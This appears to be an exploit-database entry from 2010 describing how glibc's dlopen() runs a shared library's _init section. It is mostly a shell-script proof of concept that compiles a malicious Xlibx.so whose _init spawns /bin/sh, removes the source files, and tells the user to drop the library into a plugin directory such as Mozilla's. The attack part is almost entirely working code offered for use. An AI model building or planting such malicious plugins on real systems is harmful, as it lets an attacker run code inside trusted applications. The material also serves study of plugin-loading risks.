# Exploit Title: Local Glibc shared library (.so) exploit # Date: 07.04.10 # Author: Rh0 (Rh0@z1p.biz) # Software Link: NA # Version: <= 2.11.1, higher not tested # Tested on: Debian stable (x86-64), Ubunutu 9.10 (x86), Fedora 12 (x86) # CVE : NA # Code : #!/bin/sh # A lot of applications in linux use shared library structure to be # able to load plugins. E.g. Mozilla, Geany IDE, Compiz, Epiphany web # browser and more. Shared libraries are initialized (but not loaded) # often during startup, at a click at something like "->Tools->Plugins" # in the menue or at latest when they are activated. dlopen() is used # for initializing and is part of glibc. # See http://linux.die.net/man/3/dlopen. # It always executes the _init section of the shared library. A # malformed _init section makes dlopen crash (NULL dereference). But # this is not even necessary to exploit an application, as a custom # _init section is always executed when dlopen is called . The exploit # can be in the form of a custom compiled file. Also the _init section in # a plugin already shipped with the application can be overwritten with # working shellcode to exploit it or some \x41 to crash it . # PoC: cat >Xlibx.c<<EOF #include <unistd.h> _init() { execve("/bin/sh",NULL,NULL); // evil _init } EOF gcc -fPIC -c Xlibx.c ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o rm Xlibx.c rm Xlibx.o echo "* copy Xlibx.so to appropriate directory:" echo "* Mozilla: HOMEDIR/.mozilla/plugins/ " echo "* firefox->Edit->Preferences => Exploit "